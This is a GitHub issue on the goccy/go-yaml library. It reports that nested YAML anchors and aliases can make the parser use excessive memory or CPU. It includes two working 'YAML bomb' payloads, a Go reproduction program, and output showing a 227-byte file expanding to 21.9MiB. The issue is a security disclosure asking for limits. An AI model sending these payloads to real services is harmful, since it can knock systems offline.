goccy / go-yaml

YAML support for the Go language
MIT License
1.12k stars 129 forks source link

Security issue: Parsing malicious or large YAML documents can consume excessive amounts of CPU or memory. #461

Open nclv opened 2 months ago

nclv commented 2 months ago

Improper input validation allows to parse malicious YAML payloads, causing the server to consume excessive CPU or memory, potentially crashing and becoming unavailable.

How to reproduce

a: &a [_,_,_,_,_,_,_,_,_,_,_,_,_,_,_]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e,*e]
package main

import (
    "encoding/binary"
    "fmt"
    "log"
    "math"
    "os"

    "github.com/goccy/go-yaml"
)

func prettyByteSize(b int) string {
    bf := float64(b)
    for _, unit := range []string{"", "Ki", "Mi", "Gi", "Ti", "Pi", "Ei", "Zi"} {
        if math.Abs(bf) < 1024.0 {
            return fmt.Sprintf("%3.1f%sB", bf, unit)
        }
        bf /= 1024.0
    }
    return fmt.Sprintf("%.1fYiB", bf)
}

func main() {
    data, err := os.ReadFile("./bomb.small.yaml")
    if err != nil {
        log.Fatalf("error: %v", err)
    }
    fmt.Printf("--- initial file:\n%s\n\n", prettyByteSize(binary.Size(data)))

    target := make(map[interface{}]interface{})

    err = yaml.Unmarshal(data, &target)
    if err != nil {
        log.Fatalf("error: %v", err)
    }
    // fmt.Printf("--- m:\n%v\n\n", target)

    data, err = yaml.Marshal(&target)
    if err != nil {
        log.Fatalf("error: %v", err)
    }
    fmt.Printf("--- target dump:\n%s\n\n", prettyByteSize(binary.Size(data)))
}
go run main.go 
--- initial file:
227.0B

--- target dump:
21.9MiB

The following .yaml file will be unmarshalled into several GB.

a: &a [_,_,_,_,_,_,_,_,_,_,_,_,_,_,_]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h,*h]

Expected behavior Some checks should be implemented to prevent excessive memory usage. See Add large document benchmarks, tune alias heuristic, add max depth limits #515 and go-yaml/yaml/blob/v3/decode.go.

Version Variables

Additional context CVE-2022-3064 GHSA-6q6q-88xp-6f2r